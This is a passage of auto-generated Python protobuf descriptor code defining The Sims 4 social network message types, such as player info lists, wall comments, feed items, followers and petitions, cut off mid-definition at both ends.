full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='NucleusId', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId', index=4, number=9, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='PlayerBio', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio', index=5, number=10, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='exclude_reported', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported', index=6, number=11, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='IsUserBlocked', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked', index=7, number=12, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=501, serialized_end=724) _SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList', full_name='EA.Sims4.Network.SocialPlayerInfoList', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='players', full_name='EA.Sims4.Network.SocialPlayerInfoList.players', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[ _SOCIALPLAYERINFOLIST_PLAYERINFO], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=408, serialized_end=724) _SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg', full_name='EA.Sims4.Network.SocialSearchMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='prefix', full_name='EA.Sims4.Network.SocialSearchMsg.prefix', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='search_results', full_name='EA.Sims4.Network.SocialSearchMsg.search_results', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=726, serialized_end=823) _ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage', full_name='EA.Sims4.Network.OriginErrorMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='errorcode', full_name='EA.Sims4.Network.OriginErrorMessage.errorcode', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='errormessage', full_name='EA.Sims4.Network.OriginErrorMessage.errormessage', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=825, serialized_end=886) _SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage', full_name='EA.Sims4.Network.SocialInviteResponseMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='invitationid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='invitationtype', full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='inviternucleusid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='accepternucleusid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid', index=3, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='actionSuccess', full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess', index=4, number=5, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=889, serialized_end=1040) _SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest', full_name='EA.Sims4.Network.SocialCassandraTest', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='opcode', full_name='EA.Sims4.Network.SocialCassandraTest.opcode', index=0, number=1, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1042, serialized_end=1116) _SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage', full_name='EA.Sims4.Network.SocialFriendListRequestMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='account_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friend_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='address_str', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='object_str', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='reply_proxy_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id', index=4, number=5, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1119, serialized_end=1255) _SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='requestid', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='personaName', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message_id', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1257, serialized_end=1352) _SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='requestid', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message_id', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1354, serialized_end=1448) _SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage', full_name='EA.Sims4.Network.SocialExchangeMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='envelope', full_name='EA.Sims4.Network.SocialExchangeMessage.envelope', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1450, serialized_end=1533) _SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage', full_name='EA.Sims4.Network.SocialFollowersMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='sfim_blob', full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob', index=0, number=1, type=12, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1535, serialized_end=1578) _SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage', full_name='EA.Sims4.Network.SocialFeedItemMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feed_type', full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='metadata', full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid', index=3, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='persona', full_name='EA.Sims4.Network.SocialFeedItemMessage.persona', index=4, number=5, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='quantity', full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity', index=5, number=6, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='follower_nucleusid', full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='follower_persona', full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona', index=7, number=8, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='followers_blob', full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob', index=8, number=9, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='is_maxis_curated', full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated', index=9, number=10, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1581, serialized_end=1928) _SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='data', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='count_override', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1930, serialized_end=2020) _SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage', full_name='EA.Sims4.Network.SocialWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='uuid', full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='author_id', full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='author_persona', full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message', full_name='EA.Sims4.Network.SocialWallCommentMessage.message', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2022, serialized_end=2122) _SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='starting_uuid', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_results', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='messages', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='hidden', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='exclude_reported', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported', index=6, number=7, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2125, serialized_end=2342) _SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage', full_name='EA.Sims4.Network.SocialPostWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2345, serialized_end=2475) _SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='uuid', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2477, serialized_end=2562) _SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='ending_uuid', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='messages', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='unserialized_messages', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages', index=2, number=3, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_items', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2565, serialized_end=2778) _SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage', full_name='EA.Sims4.Network.SocialRequestFollowersMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='playerid', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='id', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='prev_last_persona', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_request', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2780, serialized_end=2889) _SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage', full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='player_nucleus_id', full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2891, serialized_end=2950) _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleus_id', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='origin_persona', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='first_party_persona', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3101, serialized_end=3186) _SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='player_nucleus_id', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='player_info_list', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[ _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2953, serialized_end=3186) _SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage', full_name='EA.Sims4.Network.SocialCommentPetitionMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='commentid', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='commentKey', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3188, serialized_end=3276) _SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage', full_name='EA.Sims4.Network.SocialBioPetitionMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='bio_nucleusid', full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3278, serialized_end=3346) _SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage', full_name='EA.Sims4.Network.SocialFeedRemovalMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3348, serialized_end=3391) _SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage', full_name='EA.Sims4.Network.SocialControlMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='opcode', 